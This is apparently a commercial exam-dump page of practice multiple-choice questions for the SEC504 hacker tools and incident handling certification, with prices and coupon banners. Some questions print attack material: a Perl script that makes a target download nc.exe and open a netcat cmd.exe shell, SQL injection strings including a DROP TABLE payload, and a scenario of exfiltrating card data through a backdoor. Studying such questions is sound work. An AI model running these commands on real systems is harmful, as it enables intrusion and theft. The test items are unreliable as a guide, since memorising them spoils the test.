Weekend Sale Special Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: cramtreat

SEC504 Hacker Tools, Techniques, Exploits and Incident Handling Questions and Answers

Questions 4

Which of the following is a technique of using a modem to automatically scan a list of telephone numbers, usually dialing every number in a local area code to search for computers, Bulletin board systems, and fax machines?

Options:

A.

Demon dialing

B.

Warkitting

C.

War driving

D.

Wardialing

Buy Now
Questions 5

John works as a Professional Penetration Tester. He has been assigned a project to test the Website security of www.we-are-secure Inc. On the We-are-secure Website login page, he enters ='or''=' as a username and successfully logs on to the user page of the Web site. Now, John asks the we-aresecure Inc. to improve the login page PHP script. Which of the following suggestions can John give to improve the security of the we-are-secure Website login page from the SQL injection attack?

Options:

A.

Use the escapeshellarg() function

B.

Use the session_regenerate_id() function

C.

Use the mysql_real_escape_string() function for escaping input

D.

Use the escapeshellcmd() function

Buy Now
Questions 6

Adam works as a Network Administrator for PassGuide Inc. He wants to prevent the network from DOS attacks. Which of the following is most useful against DOS attacks?

Options:

A.

SPI

B.

Distributive firewall

C.

Honey Pot

D.

Internet bot

Buy Now
Questions 7

You work as a Network Administrator for Marioxnet Inc. You have the responsibility of handling two routers with BGP protocol for the enterprise's network. One of the two routers gets flooded with an unexpected number of data packets, while the other router starves with no packets reaching it. Which of the following attacks can be a potential cause of this?

Options:

A.

Packet manipulation

B.

Denial-of-Service

C.

Spoofing

D.

Eavesdropping

Buy Now
Questions 8

Which of the following characters will you use to check whether an application is vulnerable to an SQL injection attack?

Options:

A.

Dash (-)

B.

Double quote (")

C.

Single quote (')

D.

Semi colon (;)

Buy Now
Questions 9

Adam, a malicious hacker performs an exploit, which is given below:

#####################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#####################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host –C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

Options:

A.

Creates a share called "sasfile" on the target system

B.

Creates an FTP server with write permissions enabled

C.

Opens up a SMTP server that requires no username or password

D.

Opens up a telnet listener that requires no username or password

Buy Now
Questions 10

Buffer overflows are one of the major errors used for exploitation on the Internet today. A buffer overflow occurs when a particular operation/function writes more data into a variable than the variable was designed to hold.

Which of the following are the two popular types of buffer overflows?

Each correct answer represents a complete solution. Choose two.

Options:

A.

Dynamic buffer overflows

B.

Stack based buffer overflow

C.

Heap based buffer overflow

D.

Static buffer overflows

Buy Now
Questions 11

James works as a Database Administrator for Techsoft Inc. The company has a SQL Server 2005 computer. The computer has a database named Sales. Users complain that the performance of the database has deteriorated. James opens the System Monitor tool and finds that there is an increase in network traffic. What kind of attack might be the cause of the performance deterioration?

Options:

A.

Denial-of-Service

B.

Injection

C.

Internal attack

D.

Virus

Buy Now
Questions 12

Which of the following statements are true about worms?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Worms cause harm to the network by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.

B.

Worms can exist inside files such as Word or Excel documents.

C.

One feature of worms is keystroke logging.

D.

Worms replicate themselves from one system to another without using a host file.

Buy Now
Questions 13

Andrew, a bachelor student of Faulkner University, creates a gmail account. He uses 'Faulkner' as the password for the gmail account. After a few days, he starts receiving a lot of e-mails stating that his gmail account has been hacked. He also finds that some of his important mails have been deleted by someone. Which of the following methods has the attacker used to crack Andrew's password?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Denial-of-service (DoS) attack

B.

Zero-day attack

C.

Brute force attack

D.

Social engineering

E.

Buffer-overflow attack

F.

Rainbow attack

G.

Password guessing

Buy Now
Questions 14

Which of the following programming languages are NOT vulnerable to buffer overflow attacks?

Each correct answer represents a complete solution. Choose two.

Options:

A.

C

B.

Java

C.

C++

D.

Perl

Buy Now
Questions 15

John visits an online shop that stores the IDs and prices of the items to buy in a cookie. After selecting the items that he wants to buy, the attacker changes the price of the item to 1.

Original cookie values:

ItemID1=2

ItemPrice1=900

ItemID2=1

ItemPrice2=200

Modified cookie values:

ItemID1=2

ItemPrice1=1

ItemID2=1

ItemPrice2=1

Now, he clicks the Buy button, and the prices are sent to the server that calculates the total price.

Which of the following hacking techniques is John performing?

Options:

A.

Computer-based social engineering

B.

Man-in-the-middle attack

C.

Cross site scripting

D.

Cookie poisoning

Buy Now
Questions 16

Which of the following terms describes an attempt to transfer DNS zone data?

Options:

A.

Reconnaissance

B.

Encapsulation

C.

Dumpster diving

D.

Spam

Buy Now
Questions 17

Which of the following password cracking attacks is based on a pre-calculated hash table to retrieve plain text passwords?

Options:

A.

Rainbow attack

B.

Brute Force attack

C.

Dictionary attack

D.

Hybrid attack

Buy Now
Questions 18

Which of the following functions can you use to mitigate a command injection attack?

Each correct answer represents a part of the solution. Choose all that apply.

Options:

A.

escapeshellarg()

B.

escapeshellcmd()

C.

htmlentities()

D.

strip_tags()

Buy Now
Questions 19

Which of the following are countermeasures to prevent unauthorized database access attacks?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Session encryption

B.

Removing all stored procedures

C.

Applying strong firewall rules

D.

Input sanitization

Buy Now
Questions 20

Which of the following penetration testing phases involves reconnaissance or data gathering?

Options:

A.

Attack phase

B.

Pre-attack phase

C.

Post-attack phase

D.

Out-attack phase

Buy Now
Questions 21

Which of the following statements about a Trojan horse are true?

Each correct answer represents a complete solution. Choose two.

Options:

A.

It is a macro or script that attaches itself to a file or template.

B.

The writers of a Trojan horse can use it later to gain unauthorized access to a computer.

C.

It is a malicious software program code that resembles another normal program.

D.

It infects the boot record on hard disks and floppy disks.

Buy Now
Questions 22

Which of the following refers to the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system?

Options:

A.

Piggybacking

B.

Hacking

C.

Session hijacking

D.

Keystroke logging

Buy Now
Questions 23

You check performance logs and note that there has been a recent dramatic increase in the amount of broadcast traffic. What is this most likely to be an indicator of?

Options:

A.

Virus

B.

Syn flood

C.

Misconfigured router

D.

DoS attack

Buy Now
Questions 24

Which of the following functions in c/c++ can be the cause of buffer overflow?

Each correct answer represents a complete solution. Choose two.

Options:

A.

printf()

B.

strcat()

C.

strcpy()

D.

strlength()

Buy Now
Questions 25

In which of the following steps of the incident handling processes does the Incident Handler make sure that all business processes and functions are back to normal and then also wants to monitor the system or processes to ensure that the system is not compromised again?

Options:

A.

Eradication

B.

Lesson Learned

C.

Recovery

D.

Containment

Buy Now
Questions 26

Victor works as a professional Ethical Hacker for SecureEnet Inc. He has been assigned a job to test an image, in which some secret information is hidden, using Steganography. Victor performs the following techniques to accomplish the task:

1. Smoothening and decreasing contrast by averaging the pixels of the area where significant color transitions occurs.

2. Reducing noise by adjusting color and averaging pixel value.

3. Sharpening, Rotating, Resampling, and Softening the image.

Which of the following Steganography attacks is Victor using?

Options:

A.

Stegdetect Attack

B.

Chosen-Stego Attack

C.

Steg-Only Attack

D.

Active Attacks

Buy Now
Questions 27

You work as a System Engineer for Cyber World Inc. Your company has a single Active Directory domain. All servers in the domain run Windows Server 2008. The Microsoft Hyper-V server role has been installed on one of the servers, namely uC1. uC1 hosts twelve virtual machines. You have been given the task to configure the Shutdown option for uC1, so that each virtual machine shuts down before the main Hyper-V server shuts down. Which of the following actions will you perform to accomplish the task?

Options:

A.

Enable the Shut Down the Guest Operating System option in the Automatic Stop Action Properties on each virtual machine.

B.

Manually shut down each of the guest operating systems before the server shuts down.

C.

Create a batch file to shut down the guest operating system before the server shuts down.

D.

Create a logon script to shut down the guest operating system before the server shuts down.

Buy Now
Questions 28

Adam, a novice web user, is very conscious about the security. He wants to visit the Web site that is known to have malicious applets and code. Adam always makes use of a basic Web Browser to perform such testing.

Which of the following web browsers can adequately fill this purpose?

Options:

A.

Mozilla Firefox

B.

Internet explorer

C.

Lynx

D.

Safari

Buy Now
Questions 29

Which of the following statements are true about Dsniff?

Each correct answer represents a complete solution. Choose two.

Options:

A.

It contains Trojans.

B.

It is a virus.

C.

It is antivirus.

D.

It is a collection of various hacking tools.

Buy Now
Questions 30

Adam is a novice Web user. He chooses a 22 letters long word from the dictionary as his password.

How long will it take to crack the password by an attacker?

Options:

A.

22 hours

B.

23 days

C.

200 years

D.

5 minutes

Buy Now
Questions 31

You want to integrate the Nikto tool with nessus vulnerability scanner. Which of the following steps will you take to accomplish the task?

Each correct answer represents a complete solution. Choose two.

Options:

A.

Place nikto.pl file in the /etc/nessus directory.

B.

Place nikto.pl file in the /var/www directory.

C.

Place the directory containing nikto.pl in root's PATH environment variable.

D.

Restart nessusd service.

Buy Now
Questions 32

Which of the following steps can be taken as countermeasures against sniffer attacks?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Use encrypted protocols for all communications.

B.

Use switches instead of hubs since they switch communications, which means that information is delivered only to the predefined host.

C.

Use tools such as StackGuard and Immunix System to avoid attacks.

D.

Reduce the range of the network to avoid attacks into wireless networks.

Buy Now
Questions 33

You are the Security Consultant and have been hired to check security for a client's network. Your client has stated that he has many concerns but the most critical is the security of Web applications on their Web server. What should be your highest priority then in checking his network?

Options:

A.

Setting up IDS

B.

Port scanning

C.

Vulnerability scanning

D.

Setting up a honey pot

Buy Now
Questions 34

You work as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. You are working as a root user on the Linux operating system. Your company is facing an IP spoofing attack.

Which of the following tools will you use to get an alert saying that an upcoming IP packet is being spoofed?

Options:

A.

Despoof

B.

Dsniff

C.

ethereal

D.

Neotrace

Buy Now
Questions 35

John works as a C programmer. He develops the following C program:

#include

#include

#include

int buffer(char *str) {

char buffer1[10];

strcpy(buffer1, str);

return 1;

}

int main(int argc, char *argv[]) {

buffer (argv[1]);

printf("Executed\n");

return 1;

}

His program is vulnerable to a __________ attack.

Options:

A.

SQL injection

B.

Denial-of-Service

C.

Buffer overflow

D.

Cross site scripting

Buy Now
Questions 36

Which of the following rootkits adds additional code or replaces portions of an operating system, including both the kernel and associated device drivers?

Options:

A.

Hypervisor rootkit

B.

Boot loader rootkit

C.

Kernel level rootkit

D.

Library rootkit

Buy Now
Questions 37

Which of the following virus is a script that attaches itself to a file or template?

Options:

A.

Boot sector

B.

Trojan horse

C.

Macro virus

D.

E-mail virus

Buy Now
Questions 38

Which of the following types of attacks come under the category of hacker attacks?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Smurf

B.

IP address spoofing

C.

Teardrop

D.

Password cracking

Buy Now
Questions 39

Which of the following is the Web 2.0 programming methodology that is used to create Web pages that are dynamic and interactive?

Options:

A.

UML

B.

Ajax

C.

RSS

D.

XML

Buy Now
Questions 40

Which of the following programs is used for bypassing normal authentication for securing remote access to a computer?

Options:

A.

Backdoor

B.

Worm

C.

Adware

D.

Spyware

Buy Now
Questions 41

You want to use PGP files for steganography. Which of the following tools will you use to accomplish the task?

Options:

A.

Blindside

B.

Snow

C.

ImageHide

D.

Stealth

Buy Now
Questions 42

In which of the following attacks does an attacker use packet sniffing to read network traffic between two parties to steal the session cookie?

Options:

A.

Session fixation

B.

Cross-site scripting

C.

Session sidejacking

D.

ARP spoofing

Buy Now
Questions 43

You want to connect to your friend's computer and run a Trojan on it. Which of the following tools will you use to accomplish the task?

Options:

A.

PSExec

B.

Remoxec

C.

Hk.exe

D.

GetAdmin.exe

Buy Now
Questions 44

John used to work as a Network Administrator for We-are-secure Inc. Now he has resigned from the company for personal reasons. He wants to send out some secret information of the company. To do so, he takes an image file and simply uses a tool image hide and embeds the secret file within an image file of the famous actress, Jennifer Lopez, and sends it to his Yahoo mail id. Since he is using the image file to send the data, the mail server of his company is unable to filter this mail. Which of the following techniques is he performing to accomplish his task?

Options:

A.

Email spoofing

B.

Steganography

C.

Web ripping

D.

Social engineering

Buy Now
Questions 45

You work as a Network Penetration tester in the Secure Inc. Your company takes the projects to test the security of various companies. Recently, Secure Inc. has assigned you a project to test the security of a Web site. You go to the Web site login page and you run the following SQL query:

SELECT email, passwd, login_id, full_name

FROM members

WHERE email = 'attacker@somehwere.com'; DROP TABLE members; --'

What task will the above SQL query perform?

Options:

A.

Deletes the database in which members table resides.

B.

Deletes the rows of members table where email id is 'attacker@somehwere.com' given.

C.

Performs the XSS attacks.

D.

Deletes the entire members table.

Buy Now
Questions 46

Which of the following protocols is a maintenance protocol and is normally considered a part of the IP layer, but has also been used to conduct denial-of-service attacks?

Options:

A.

ICMP

B.

L2TP

C.

TCP

D.

NNTP

Buy Now
Questions 47

You work as a professional Ethical Hacker. You are assigned a project to test the security of www.weare- secure.com. You somehow enter in we-are-secure Inc. main server, which is Windows based.

While you are installing the NetCat tool as a backdoor in the we-are-secure server, you see the file credit.dat having the list of credit card numbers of the company's employees. You want to transfer the credit.dat file in your local computer so that you can sell that information on the internet in the good price. However, you do not want to send the contents of this file in the clear text format since you do not want that the Network Administrator of the we-are-secure Inc. can get any clue of the hacking attempt. Hence, you decide to send the content of the credit.dat file in the encrypted format.

What steps should you take to accomplish the task?

Options:

A.

You will use the ftp service.

B.

You will use Wireshark.

C.

You will use CryptCat instead of NetCat.

D.

You will use brutus.

Buy Now
Questions 48

Which of the following is the method of hiding data within another media type such as graphic or document?

Options:

A.

Spoofing

B.

Steganography

C.

Packet sniffing

D.

Cryptanalysis

Buy Now
Questions 49

Which of the following procedures is designed to enable security personnel to identify, mitigate, and recover from malicious computer incidents, such as unauthorized access to a system or data, denialof-service, or unauthorized changes to system hardware, software, or data?

Options:

A.

Disaster Recovery Plan

B.

Cyber Incident Response Plan

C.

Crisis Communication Plan

D.

Occupant Emergency Plan

Buy Now
Exam Code: SEC504
Exam Name: Hacker Tools, Techniques, Exploits and Incident Handling
Last Update: May 18, 2024
Questions: 328
SEC504 pdf

SEC504 PDF

$28  $80
SEC504 Engine

SEC504 Testing Engine

$33.25  $95
SEC504 PDF + Engine

SEC504 PDF + Testing Engine

$45.5  $130